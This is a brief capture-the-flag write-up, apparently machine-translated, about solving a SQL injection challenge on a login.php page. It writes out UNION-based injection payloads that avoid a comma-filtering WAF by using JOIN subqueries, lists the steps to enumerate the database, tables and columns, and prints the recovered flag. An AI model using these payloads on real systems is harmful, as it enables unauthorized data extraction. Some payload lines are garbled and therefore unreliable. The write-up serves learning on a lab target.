Today i made a spring and the above questions, something to record it.
View source by source prompted to enter login.php? Id = 1
After burp capture nothing valuable information. Read other people's wp find the need to capture the first page, then you can find a 302 redirect. Simple to understand is that there is a page to jump before we get into the topic of the moment.
Real url is l0gin.php? Id = 1.
This follow-up file
First, by measuring about routine database characters are filtered.
It was found when the input id = 1 'and ascii (substr ((select database ()), 1,1))> 64% 23
Comma is waf out.
Learn about the comma-free injection
Record it
If the comma is not a problem, the normal routine should be
?id=-1' union select 1,2#
?id=-1' union select database(),2#
?id=-1' union select table_name from information.schema.tables where table_schema where table_schema=database() #
join instead of commas:
一,-1' union select * from (select database()) a join (select 2) b %23
Database name sqli
Second, the check table data
-1' union select * from (select group_concat(distinct(table_name)) from information_schema.tables where table_schema='sqli') a join ( select 2 ) b %23
three,
-1 ' union select * from (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users') a join ( select 2 ) b %23
四,
-1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select 2) b %23
flag{39502a7a-7f1d-4bd4-bd72-eddba8603eea}